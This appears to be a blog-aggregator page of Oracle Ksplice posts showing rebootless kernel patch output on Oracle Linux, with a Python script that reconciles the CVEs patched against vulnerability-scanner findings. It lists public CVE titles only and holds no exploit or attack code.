Installing [6hrf2a3e] CVE-2010-4083: Information leak in System V IPC.
Installing [3xm2ly3f] CVE-2010-4158: Kernel information leak in socket filters.
Installing [5y2oasdw] CVE-2010-4525: Information leak in KVM VCPU events ioctl.
Installing [35e4qfr6] CVE-2010-2492: Privilege escalation in eCryptfs.
Installing [rr12rtq3] Data corruption due to bad flags in break_lease and may_open.
Installing [20cz9gp7] Kernel oops in network neighbour update.
Installing [m650djkx] Deadlock on fsync during dm device resize.
Installing [c19gus65] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Installing [3e86rex1] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Installing [cxb3m3ae] CVE-2010-4165: Denial of service in TCP from user MSS.
Installing [dii4wm64] CVE-2010-4169: Use-after-free bug in mprotect system call.
Installing [e465fr49] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Installing [5s3fe1cn] Mitigate denial of service attacks with large argument lists.
Installing [j8jwyth1] Memory corruption in multipath deactivation queueing.
Installing [5qkkyd5m] Kernel panic in network bonding on ARP receipt.
Installing [f9j8s6u6] Failure to recover NFSv4 client state on server reboot.
Installing [qa379ag5] CVE-2011-0714: Remote denial of service in RPC server sockets.
Installing [12q8wuvd] CVE-2011-0521: Buffer underflow vulnerability in av7110 driver.
Installing [tm68xsph] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Installing [fk2zg5ec] CVE-2010-4656: Buffer overflow in I/O-Warrior USB driver.
Installing [bcfvwcux] CVE-2011-0716: Memory corruption in IGMP bridge snooping.
Installing [smkv0oja] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Installing [3eu2kr7i] CVE-2010-3296: Kernel information leak in cxgb driver.
Installing [3skmaxct] CVE-2010-4346: Bypass of mmap_min_addr using install_special_mapping.
Installing [xuxi8p7r] CVE-2010-4648: Ineffective countermeasures in Orinoco wireless driver.
Installing [7npiqvil] CVE-2010-4655: Information leak in ETHTOOL_GREGS ioctl.
Installing [en0luyx8] Denial of service on empty virtio_console write.
Installing [yv0cumoa] Denial of service in r8169 receive queue handling.
Installing [j6vlp89e] Failure of virtio_net device on guest low-memory condition.
Installing [q53j90kj] KVM guest crash due to stale memory on migration.
Installing [ri498cnm] KVM guest crash due to unblocked NMIs on STI instruction.
Installing [tlrgiz2i] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Installing [9eta98wf] Use-after-free in CIFS session management.
Installing [19wu4xr4] CVE-2011-0712: Buffer overflows in caiaq driver.
Installing [3cxo6wrf] CVE-2011-1079: Denial of service in Bluetooth BNEP.
Installing [kzieu2je] CVE-2011-1080: Information leak in netfilter.
Installing [ekzp14u9] CVE-2010-4258: Failure to revert address limit override after oops.
Installing [jd3cmfll] CVE-2011-0006: Unhandled error condition when adding security rules.
Installing [jk52g3fx] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Installing [z2ne1xi4] CVE-2011-1013: Signedness error in drm.
Installing [gb4ntots] Cache allocation bug in DCCP.
Installing [pe4f00pm] CVE-2011-1093: NULL pointer dereference in DCCP.
Installing [yypibd1k] CVE-2011-1573: Denial of service in SCTP.
Installing [02al7nxj] CVE-2011-0726: Address space leakage through /proc/pid/stat.
Installing [00ahpz3z] CVE-2011-0711: Information leak in XFS filesystem.
Installing [iczdh30p] CVE-2010-4250: Reference count leak in inotify failure path.
Installing [ea8bohrp] Infinite loop in tty auditing.
Installing [85iuyyyj] Buffer overflow in iptables CLUSTERIP target.
Installing [8o0892h3] CVE-2010-4565: Information leak in Broadcast Manager CAN protocol.
Installing [p3ck0dr6] CVE-2011-1019: Module loading restriction bypass with CAP_NET_ADMIN.
Installing [w8sa7qie] CVE-2011-1016: Privilege escalation in radeon GPU driver.
Installing [aqnhua0z] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Installing [mla0f8wz] CVE-2011-1082: Denial of service in epoll.
Installing [5dbkxjue] CVE-2011-1090: Denial of service in NFSv4 client.
Installing [4qj7c7qc] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Installing [3vf1zjzf] CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Installing [a03rwxbz] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Installing [7z04dctw] Incorrect interrupt handling on down e1000 interface.
Installing [ep319ryq] CVE-2011-1770: Remote denial of service in DCCP options parsing.
Installing [qp7al6tc] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Installing [85n0mc4q] CVE-2011-1598: Denial of service in CAN/BCM protocol.
Installing [z8t1hsjb] CVE-2011-1748: Denial of service in CAN raw sockets.
Installing [pvtdn3yd] CVE-2011-1767: Incorrect initialization order in ip_gre.
Installing [xughs2jb] CVE-2011-1768: Incorrect initialization order in IP tunnel protocols.
Installing [k6a6bqyr] CVE-2011-2479: Denial of service with transparent hugepages and /dev/zero.
Installing [pmkvbrcc] CVE-2011-1776: Missing boundary checks in EFI partition table parsing.
Installing [pb9pjnnn] CVE-2011-1182: Signal spoofing in rt_sigqueueinfo.
Installing [mnpd8mip] CVE-2011-1593: Missing bounds check in proc filesystem.
Installing [d6vuea6w] CVE-2011-2213: Arbitrary code injection bug in IPv4 subsystem.
Installing [zmfowuqn] CVE-2011-2491: Local denial of service in NLM subsystem.
Installing [402w3brr] CVE-2011-2492: Information leak in bluetooth implementation.
Installing [vi7qxs20] CVE-2011-2497: Buffer overflow in the Bluetooth subsystem.
Installing [ql0oxrhk] CVE-2011-2517: Buffer overflow in nl80211 driver.
Installing [0xcbigxp] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Installing [127f4d1u] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Installing [w72wz6f4] CVE-2011-2495: Information leak in /proc/PID/io.
Installing [c8v0sk8t] CVE-2011-1160: Information leak in tpm driver.
Installing [1nt1dahj] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Installing [bxqvqvef] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Installing [d4m9k310] CVE-2011-2484: Denial of service in taskstats subsystem.
Installing [3vlbyy24] CVE-2011-2496: Local denial of service in mremap().
Installing [e0lkqz3i] CVE-2011-2723: Remote denial of service vulnerability in gro.
Installing [99r3sbjg] CVE-2011-2898: Information leak in packet subsystem
Installing [3ev4sw2b] CVE-2011-2918: Denial of service in event overflows in perf.
Installing [ll9j5877] CVE-2011-1833: Information disclosure in eCryptfs.
Installing [ww2gv7iv] CVE-2011-3359: Denial of service in Broadcom 43xx wireless driver.
Installing [9x0ub4l1] CVE-2011-3363: Denial of service in CIFS via malicious DFS referrals.
Installing [ggvpdbug] CVE-2011-3188: Weak TCP sequence number generation.
Installing [z4pt0sai] CVE-2011-1577: Denial of service in GPT partition handling.
Installing [omnzxxxr] CVE-2011-3353: Denial of service in FUSE via FUSE_NOTIFY_INVAL_ENTRY.
Installing [o4xkg2el] CVE-2011-3191: Privilege escalation in CIFS directory reading.
Installing [e2eyyaf9] CVE-2011-1162: Information leak in TPM driver.
Installing [1fmgtd1b] CVE-2011-4326: Denial of service in IPv6 UDP Fragmentation Offload.
Installing [ldjwxwd5] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Installing [tnhvync5] CVE-2011-2494: Information leak in task/process statistics.
Installing [gi4te905] CVE-2011-3593: Denial of service in VLAN with priority tagged frames.
Installing [h1wiua6s] CVE-2011-4110: Denial of service in kernel key management facilities.
Installing [4yrxpwih] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Installing [gz5jfzi3] CVE-2011-1020: Missing access restrictions in /proc subsystem.
Installing [o31erbbr] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Installing [yqaa1zsp] Arithmetic overflow in clock source calculations.
Installing [vxfxrncu] CVE-2011-4077: Buffer overflow in xfs_readlink.
Installing [rnvy1bow] CVE-2011-4081: NULL pointer dereference in GHASH cryptographic algorithm.
Installing [5bokjzmm] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Installing [q7t7hls4] CVE-2011-4347: Denial of service in KVM device assignment.
Installing [wmeoffm9] CVE-2011-4622: NULL pointer deference in KVM interval timer emulation.
Installing [gu3picnz] CVE-2012-0038: In-memory corruption in XFS ACL processing.
Installing [v2td9qse] CVE-2012-0045: Denial of service in KVM system call emulation.
Installing [n2xairv0] CVE-2012-0879: Denial of service in CLONE_IO.
Installing [2k2kq44h] Fix crash on discard in the software RAID driver.
Installing [i244mlk5] CVE-2012-1097: NULL pointer dereference in the ptrace subsystem.
Installing [2anjx00z] CVE-2012-1090: Denial of service in the CIFS filesystem reference counting.
Installing [3ujb9j7q] Inode corruption in XFS inode lookup.
Installing [01x2k6jv] Denial of service due to race condition in the scheduler subsystem.
Installing [hfh1ug4u] CVE-2011-4086: Denial of service in journaling block device.
Installing [4wb0i9tz] CVE-2012-1601: Denial of service in KVM VCPU creation.
Installing [aqut3qai] CVE-2012-0044: Integer overflow and memory corruption in DRM CRTC support.
Installing [0zkt2e47] CVE-2012-2123: Privilege escalation when assigning permissions using fcaps.
Installing [pe6u1nwx] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Installing [jqtlake1] CVE-2012-2121: Memory leak in KVM device assignment.
Installing [u6ys5804] CVE-2012-2137: Buffer overflow in KVM MSI routing entry handler.
Installing [lr9cjz2p] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Installing [nscqru85] CVE-2012-1179 and CVE-2012-2373: Hugepage denial of service.
Installing [j01o1nco] ext4 filesystem corruption on fallocate.
Installing [p37lmn34] CVE-2012-2745: Denial-of-service in kernel key management.
Installing [alprvnsv] CVE-2012-2744: Remote denial-of-service in IPv6 connection tracking.
Installing [m06ws6vc] Unreliable futexes with read-only shared mappings.
Installing [b7mpy2k1] CVE-2011-1078: Information leak in Bluetooth SCO link driver.
Installing [pywfzhvz] CVE-2012-2384: Integer overflow in i915 execution buffer.
Installing [2ibdnvmo] Livelock due to invalid locking strategy when adding a leap-second.
Installing [oixf5hkj] CVE-2012-2384: Additional fix for integer overflow in i915 execution buffer.
Installing [m4x7vdnl] CVE-2012-2390: Memory leak in hugetlbfs mmap() failure.
Installing [o2a3jmox] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Installing [u3qpyl86] CVE-2012-3430: kernel information leak in RDS sockets.
Installing [wr1of5oe] CVE-2012-3552: Denial-of-service in IP options handling.
Installing [y40wlmcw] CVE-2012-3412: Remote denial of service through TCP MSS option in SFC NIC.
Installing [dxshabnc] Use-after-free in USB.
Installing [aovf4isj] Race condition in SUNRPC.
Installing [trz9wa6p] CVE-2012-3400: Buffer overflow in UDF parsing.
Installing [062ge0uf] CVE-2012-3511: Use-after-free due to race condition in madvise.
Installing [tu585kp5] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Installing [fky5li3t] CVE-2012-2133: Use-after-free in hugetlbfs quota handling.
Installing [xtpg99y6] CVE-2012-5517: NULL pointer dereference in memory hotplug.
Installing [ffehzdo8] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Installing [u0d6ztl3] CVE-2012-4565: Divide by zero in TCP congestion control Algorithm.
Installing [7au7wp12] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Installing [80vrmgyk] CVE-2012-4530: Kernel information leak in binfmt execution.
Installing [uytq1dk0] CVE-2012-4398: Denial-of-service in kernel module loading.
Installing [3c5erej0] CVE-2013-0310: NULL pointer dereference in CIPSO socket options.
Installing [j8x8j89y] CVE-2013-0311: Privilege escalation in vhost descriptor management.
Installing [mkibg12j] CVE-2012-4508: Stale data exposure in ext4.
Installing [daw7s3mo] CVE-2012-4542: SCSI command filter does not restrict access to read-only devices.
Installing [nqlo7yy2] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Installing [l6zf9mec] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Installing [r88p6prz] CVE-2013-1798: Information leak in KVM APIC driver.
Installing [tquaqo7o] CVE-2013-1792: Denial-of-service in user keyring management.
Installing [ao71x17l] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Installing [875umolk] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Installing [4dr93r2j] CVE-2013-1827: Denial-of-service in DCCP socket options.
Installing [cdrfdlrt] CVE-2013-0349: Kernel information leak in Bluetooth HIDP support.
Installing [9j8xk8dz] CVE-2012-6546: Information leak in ATM sockets.
Installing [4oeurjvw] CVE-2013-1767: Use-after-free in tmpfs mempolicy remount.
Installing [yhprsmoc] CVE-2013-1773: Heap buffer overflow in VFAT Unicode handling.
Installing [amh400jp] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Installing [532069fc] CVE-2013-1774: NULL pointer dereference in USB Inside Out Edgeport serial driver.
Installing [uaslykxk] CVE-2013-2017: Double free in Virtual Ethernet Tunnel driver (veth).
Installing [1vegmzxj] CVE-2013-1943: Local privilege escalation in KVM memory mappings.
Installing [wddz9qxt] CVE-2012-6548: Information leak in UDF export.
Installing [d51dm2vs] CVE-2013-0914: Information leak in signal handlers.
Installing [sxb5x0pd] CVE-2013-2852: Invalid format string usage in Broadcom B43 wireless driver.
Installing [vzlh2p9r] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Installing [l1wlz1f1] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Installing [m0y7j4ra] CVE-2013-3225: Kernel stack information leak in Bluetooth rfcomm.
Installing [3m5ckvvm] CVE-2013-3301: NULL pointer dereference in tracing sysfs files.
Installing [o44ucnfs] CVE-2013-2634, 2635: Kernel leak in data center bridging and netlink.
Installing [0m3a5xq8] CVE-2013-2128: Denial of service in TCP splice.
Installing [2fg4nowt] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Installing [m4a0xb93] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Installing [pqfoprcp] CVE-2013-2237: Information leak on IPSec key socket.
Installing [i1ha5yp7] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Installing [aqfegdn1] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Installing [oojymn3l] CVE-2013-4387: Memory corruption in IPv6 UDP fragmentation offload.
Installing [kb7zovzd] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Installing [7ew8svwd] Off-by-one error causes reduced entropy in kernel PRNG.
Installing [v3hs5diu] CVE-2013-2888: Memory corruption in Human Input Device processing.
Installing [aew2tmdl] CVE-2013-2889: Memory corruption in Zeroplus HID driver.
Installing [ox2wqeva] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Installing [w9rhkfub] CVE-2013-1928: Kernel information leak in compat_ioctl/VIDEO_SET_SPU_PALETTE.
Installing [r55nqyci] CVE-2013-2164: Kernel information leak in the CDROM driver.
Installing [1vgf62zi] CVE-2013-2234: Information leak in IPsec key management.
Installing [hc532irb] CVE-2013-2851: Format string vulnerability is software RAID device names.
Installing [e129vh8h] CVE-2013-4592: Denial-of-service in KVM IOMMU mappings.
Installing [9wzwcaep] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Installing [ufm8ladu] CVE-2013-4470: Memory corruption in IPv4 and IPv6 networking corking with UFO.
Installing [5rh9jkmi] CVE-2013-6367: Divide-by-zero in KVM LAPIC.
Installing [ur8700aj] CVE-2013-6368: Memory corruption in KVM virtual APIC accesses.
Installing [nyg2e0m1] Error in the tag insertion logic of the bonding network device.
Installing [1ekik21n] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Installing [m8de4fmg] CVE-2013-7263, CVE-2013-7265: Information leak in IPv4, IPv6 and PhoNet socket recvmsg.
Installing [p4ufjdr0] CVE-2014-0101: NULL pointer dereference in SCTP protocol.
Installing [o86dh6ww] Use-after-free in EDAC Intel E752X driver.
Installing [b2h8hej4] Deadlock in XFS filesystem when removing a inode from namespace.
Installing [nvhmnvp6] Memory leak in GFS2 filesystem for files with short lifespan.
Installing [7brqevk0] CVE-2013-1860: Buffer overflow in Wireless Device Management driver.
Installing [4nh0vuhi] Missing check in selinux for IPSec TCP SYN-ACK packets.
Installing [zvvk1k2q] Logic error in selinux when checking permissions on recv socket.
Installing [2mxh0jvn] CVE-2013-(726[6789], 727[01], 322[89], 3231): Information leaks in recvmsg.
Installing [1r5tw9sm] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Installing [z4k7xryp] CVE-2014-2523: Remote crash via DCCP conntrack.
Installing [pi89wa2j] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Installing [b4x8o44g] CVE-2014-0196: Pseudo TTY device write buffer handling race.
Installing [s8s7tfsm] CVE-2014-3153: Local privilege escalation in futex requeueing.
Installing [bqk9mi1j] CVE-2013-6378: Denial-of-service in Marvell 8xxx Libertas WLAN driver.
Installing [rokmr7ey] CVE-2014-1874: Denial-of-service in SELinux on empty security context.
Installing [hxq9cdju] CVE-2014-0203: Memory corruption on listing procfs symbolic links.
Installing [n6kpf53d] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Installing [pbab6ibn] CVE-2014-4943: Privilege escalation in PPP over L2TP setsockopt/getsockopt.
Installing [8n932y6h] CVE-2014-5077: Remote denial-of-service in SCTP on simultaneous connections.
Installing [yfh1rar2] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Installing [5z4hhyp3] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Installing [1vpc7i76] CVE-2012-6647: NULL pointer dereference in non-pi futexes.
Installing [ruu6bc4r] CVE-2014-3144, CVE-2014-3145: Multiple local denial of service vulnerabilities in netlink.
Installing [hgeqfh2x] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Installing [345v5a2z] CVE-2014-4667: Denial-of-service in SCTP stack when unpacking a COOKIE_ECHO chunk.
Installing [92st5y9o] CVE-2014-0205: Use-after-free in futex refcounting.
Your kernel is fully up to date.
Effective kernel version is 2.6.32-431.29.2.el6

real	1m26.960s
user	0m39.562s
sys	0m34.806s
So: 1 minute 27 seconds for 267 patches, both CVEs and critical fixes...
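One caveat that follows from the three Ksplice posts here (this one, the container post above and the OL5 post below): after uptrack-upgrade the booted kernel is still the one `uname -r` reports, so a vulnerability scanner or compliance check that keys on that string will keep flagging CVEs the host has already closed. The effective version comes from the Ksplice tools (`uptrack-uname -r`, or the "Effective kernel version" line above), and the patch list itself says which CVEs are closed. Below is an added example, not Oracle's code, that parses uptrack-upgrade output into the set of CVE ids it actually covers and reconciles that against what a `uname -r`-based scanner reports. It handles the shorthand the real output uses ("CVE-2013-2634, 2635", "CVE-2013-(726[6789], 727[01], 322[89], 3231)", two patches for one CVE) and is fed an excerpt of the output shown above as constructed sample input; the scanner finding at the end is constructed too.

```python
import re
from dataclasses import dataclass, field

# One "Installing [id] description" line of uptrack-upgrade output.
PATCH_LINE = re.compile(r"^\s*Install(?:ing)?\s+\[([0-9a-z]+)\]\s+(.*?)\s*$")
# Grouped form: "CVE-2013-(726[6789], 727[01], 322[89], 3231)" is one year followed
# by a parenthesised list of sequence numbers that may use shell-style digit classes.
CVE_GROUPED = re.compile(r"CVE-(\d{4})-\(([^)]*)\)")
# Plain form, optionally followed by bare sequence numbers sharing the same year:
# "CVE-2010-4163", "CVE-2013-2634, 2635".
CVE_PLAIN = re.compile(r"CVE-(\d{4})-(\d{4,7})((?:,\s*\d{4,7})*)")
DIGIT_CLASS = re.compile(r"\[(\d+)\]")
EFFECTIVE = re.compile(r"^\s*Effective kernel version is\s+(\S+)")


def expand_digit_class(pattern):
    """'726[6789]' -> ['7266', '7267', '7268', '7269']; plain numbers pass through."""
    m = DIGIT_CLASS.search(pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    return [p for d in m.group(1) for p in expand_digit_class(head + d + tail)]


def cves_in(description):
    """Return the set of CVE ids named in one patch description."""
    found = set()

    def take_grouped(m):
        year = m.group(1)
        for pat in m.group(2).split(","):
            for seq in expand_digit_class(pat.strip()):
                found.add(f"CVE-{year}-{seq}")
        return ""  # strip the group so the plain regex does not re-read its digits

    rest = CVE_GROUPED.sub(take_grouped, description)
    for year, first, extra in CVE_PLAIN.findall(rest):
        found.add(f"CVE-{year}-{first}")
        for seq in re.findall(r"\d{4,7}", extra):
            found.add(f"CVE-{year}-{seq}")
    return found


@dataclass
class UptrackRun:
    patches: dict = field(default_factory=dict)  # patch id -> description
    cves: set = field(default_factory=set)       # distinct CVE ids closed
    effective_kernel: str = ""


def parse_uptrack_output(text):
    """Parse uptrack-upgrade output into patch ids, CVE ids and the effective kernel."""
    run = UptrackRun()
    for line in text.splitlines():
        m = PATCH_LINE.match(line)
        if m:
            patch_id, desc = m.groups()
            run.patches[patch_id] = desc
            run.cves |= cves_in(desc)
            continue
        m = EFFECTIVE.match(line)
        if m:
            run.effective_kernel = m.group(1)
    return run


def still_open(flagged_cves, run):
    """CVEs a scanner flags (keyed on the booted uname -r) that Ksplice did not close."""
    return sorted(set(flagged_cves) - run.cves)


# Excerpt of the uptrack-upgrade output shown in the post, used here as sample input.
SAMPLE = """\
Installing [1y0hqxq7] Invalid memory access in dynamic debug entry listing.
Installing [jxtltpyu] CVE-2010-4163 and CVE-2010-4668: Kernel panic in block subsystem.
Installing [jk52g3fx] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Installing [pywfzhvz] CVE-2012-2384: Integer overflow in i915 execution buffer.
Installing [oixf5hkj] CVE-2012-2384: Additional fix for integer overflow in i915 execution buffer.
Installing [o44ucnfs] CVE-2013-2634, 2635: Kernel leak in data center bridging and netlink.
Installing [2mxh0jvn] CVE-2013-(726[6789], 727[01], 322[89], 3231): Information leaks in recvmsg.
Installing [s8s7tfsm] CVE-2014-3153: Local privilege escalation in futex requeueing.
Your kernel is fully up to date.
Effective kernel version is 2.6.32-431.29.2.el6
"""

if __name__ == "__main__":
    run = parse_uptrack_output(SAMPLE)
    print(len(run.patches), "patches,", len(run.cves), "distinct CVEs, effective kernel", run.effective_kernel)
    # Constructed scanner finding: both ids would be flagged against the booted uname -r,
    # but only the one absent from this excerpt is genuinely still open.
    print(still_open(["CVE-2014-3153", "CVE-2014-0196"], run))
```

On the excerpt this yields 8 patches covering 17 distinct CVEs (the grouped line alone expands to nine), and CVE-2014-0196 is left as still open because it is not in the excerpt. In practice you would feed it the full output, or `uptrack-show`, and report the effective kernel version rather than `uname -r` to whatever consumes the scan.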

by wcoekaer at October 15, 2014 09:15 PM

The magic of ksplice

I love talking about Oracle Ksplice and how cool a technology and feature it is. Whenever I explain to customers how much they can do with it, they often just can't believe the capabilities until I show them, in literally 5 seconds, that it really -just works-.

During Oracle OpenWorld we talked about it a lot, of course, and I wanted to show you how far back these Ksplice updates can go: how much flexibility it gives a system administrator in terms of which kernel to run, and how easy and fast it is.

One of the main advantages of the Ksplice technology is that we can build these updates for many, many, yes many... kernels, with a highly automated and scalable build infrastructure. When we publish a Ksplice update, we build it for -every kernel errata- released since the first kernel we started to support for that major distribution release. What does this mean? In the case of Oracle Linux 5, we currently support Ksplice updates starting with the kernel of Oracle Linux 5 update 4, the base kernel being the Red Hat Compatible Kernel 2.6.18-164.el5, built Thu Sep 3 04:15:13 EDT 2009. Yes, you read that right: September 2009. So during the lifetime of Oracle Linux 5, starting with that kernel, we publish Ksplice updates for every kernel released since then, up to today (and forward, of course). No matter which errata kernel you are on since -164, or which Oracle Linux 5 update release, Ksplice updates released after that date are available for all those kernels. A simple uptrack-upgrade takes the running kernel up to the latest updates. While the main focus of the Ksplice online updates is CVEs, we add critical fixes as well, so it is a combination of both.

So back to OL5.4. Running uname shows 2.6.18-164.el5. After uptrack-upgrade -y the effective kernel version is 2.6.18-398.el5 (which, by the way, is the latest 2.6.18 kernel for OL5). You can see the output below, including how many 'minutes' it took, without a reboot, everything current and active right away. You can follow the time frame by looking at the year in each CVE id: you will see CVEs from 2009, 2010, 2011, 2012, 2013 and 2014. Completely current.

This can be done on a running system: to install Ksplice and start using it you don't need to reboot, just install the uptrack tools and you're good to go. You can stay current with CVEs and critical bugs without rebooting for years. You can be current even though you run an older update release of Oracle Linux, without being required to take new kernels that (in the RHCK case) potentially have new features backported, introducing new code beyond bug fixes and new device drivers, which on a stable system you don't necessarily want or need. It is always good to update to a newer kernel when you get new hardware and need new device drivers, but for existing stable production systems you don't really want or need that, nor do you necessarily need code from new kernels backported into older versions (again, in particular in the RHCK case), which introduces a lot of change; I will show the lines-of-code change in another blog entry. Ksplice lets you stick with an older version, yet anything critical and CVE related will be there for you, and this for any errata kernel you start with since, in the OL5 case, update 4... Not just one update earlier, but any kernel at any point in time.

If you do have periodic scheduled reboots, fine: install the kernel RPMs so that the next time you reboot it boots into the latest kernel, if you want, but you don't have to. You have complete flexibility if and when you need it.

I hope that this output, and the follow-up blog I will do on OL6 as a similar example, shows how scalable this is, how much use it has had, how many updates we have done and can do, and how complex these updates are (not just a one-liner change in some file); this is not a one-off for one customer case. There are also tons of checks in place so that it works with kernel modules and won't lock up your box: we validate that it is the right kernel, that these updates are safe to apply, etc, etc.. Proven, 7+ years old technology, and completely supported by us. You can run your database or middleware software and run uptrack-upgrade while it's up and running and humming along... perfectly OK.

time uptrack-upgrade -y
The following steps will be taken:
Install [v5267zuo] Clear garbage data on the kernel stack when handling signals.
Install [u4puutmx] CVE-2009-2849: NULL pointer dereference in md.
Install [302jzohc] CVE-2009-3286: Incorrect permissions check in NFSv4.
Install [k6oev8o2] CVE-2009-3228: Information leaks in networking systems.
Install [tvbl43gm] CVE-2009-3613: Remote denial of service in r8169 driver.
Install [690q6ok1] CVE-2009-2908: NULL pointer dereference in eCryptfs.
Install [ijp9g555] CVE-2009-3547: NULL pointer dereference opening pipes.
Install [1ala9dhk] CVE-2009-2695: SELinux does not enforce mmap_min_addr sysctl.
Install [5fq3svyl] CVE-2009-3621: Denial of service shutting down abstract-namespace sockets.
Install [bjdsctfo] CVE-2009-3620: NULL pointer dereference in ATI Rage 128 driver.
Install [lzvczyai] CVE-2009-3726: NFSv4: Denial of Service in NFS client.
Install [25vdhdv7] CVE-2009-3612: Information leak in the netlink subsystem.
Install [wmkvlobl] CVE-2007-4567: Remote denial of service in IPv6
Install [ejk1k20m] CVE-2009-4538: Denial of service in e1000e driver.
Install [c5das3zq] CVE-2009-4537: Buffer underflow in r8169 driver.
Install [issxhwza] CVE-2009-4536: Denial of service in e1000 driver.
Install [kyibbr3e] CVE-2009-4141: Local privilege escalation in fasync_helper().
Install [jfp36tzw] CVE-2009-3080: Privilege Escalation in GDT driver.
Install [4746ikud] CVE-2009-4021: Denial of service in fuse_direct_io.
Install [234ls00d] CVE-2009-4020: Buffer overflow mounting corrupted hfs filesystem.
Install [ffi8v0vl] CVE-2009-4272: Remote DOS vulnerabilities in routing hash table.
Install [fesxf892] CVE-2006-6304: Rewrite attack flaw in do_coredump.
Install [43o4k8ow] CVE-2009-4138: NULL pointer dereference flaw in firewire-ohci driver.
Install [9xzs9dxx] Kernel panic in do_wp_page under heavy I/O load.
Install [qdlkztzx] Kernel crash forwarding network traffic.
Install [ufo0resg] CVE-2010-0437: NULL pointer dereference in ip6_dst_lookup_tail.
Install [490guso5] CVE-2010-0007: Missing capabilities check in ebtables module.
Install [zwn5ija2] CVE-2010-0415: Information Leak in sys_move_pages
Install [n8227iv2] CVE-2009-4308: NULL pointer dereference in ext4 decoding EROFS w/o a journal.
Install [988ux06h] CVE-2009-4307: Divide-by-zero mounting an ext4 filesystem.
Install [2jp2pio6] CVE-2010-0727: Denial of Service in GFS2 locking.
Install [xem0m4sg] Floating point state corruption after signal.
Install [bkwy53ji] CVE-2010-1085: Divide-by-zero in Intel HDA driver.
Install [3ulklysv] CVE-2010-0307: Denial of service on amd64
Install [jda1w8ml] CVE-2010-1436: Privilege escalation in GFS2 server
Install [trws48lp] CVE-2010-1087: Oops when truncating a file in NFS
Install [ij72ubb6] CVE-2010-1088: Privilege escalation with automount symlinks
Install [gmqqylxv] CVE-2010-1187: Denial of service in TIPC
Install [3a24ltr0] CVE-2010-0291: Multiple denial of service bugs in mmap and mremap
Install [7mm0u6cz] CVE-2010-1173: Remote denial of service in SCTP
Install [fd1x4988] CVE-2010-0622: Privilege escalation by futex corruption
Install [l5qljcxc] CVE-2010-1437: Privilege escalation in key management
Install [xs69oy0y] CVE-2010-1641: Permission check bypass in GFS2
Install [lgmry5fa] CVE-2010-1084: Privilege escalation in Bluetooth subsystem.
Install [j7m6cafl] CVE-2010-2248: Remote denial of service in CIFS client.
Install [avqwduk3] CVE-2010-2524: False CIFS mount via DNS cache poisoning.
Install [6qplreu2] CVE-2010-2521: Remote buffer overflow in NFSv4 server.
Install [5ohnc2ho] CVE-2010-2226: Read access to write-only files in XFS filesystem.
Install [i5ax6hf4] CVE-2010-2240: Privilege escalation vulnerability in memory management.
Install [50ydcp2k] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Install [59car2zc] CVE-2010-2798: Denial of service in GFS2.
Install [dqjlyw67] CVE-2010-2492: Privilege Escalation in eCryptfs.
Install [5mgd1si0] Improved fix to CVE-2010-1173.
Install [qr5isvgk] CVE-2010-3015: Integer overflow in ext4 filesystem.
Install [sxeo6c33] CVE-2010-1083: Information leak in USB implementation.
Install [mzgdwuwp] CVE-2010-2942: Information leaks in traffic control dump structures.
Install [19jigi5v] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Install [rg7pe3n8] CVE-2010-3067: Information leak in sys_io_submit.
Install [n3tg4mky] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Install [s2y6oq9n] CVE-2010-3086: Denial of Service in futex atomic operations.
Install [9subq5sx] CVE-2010-3477: Information leak in tcf_act_police_dump.
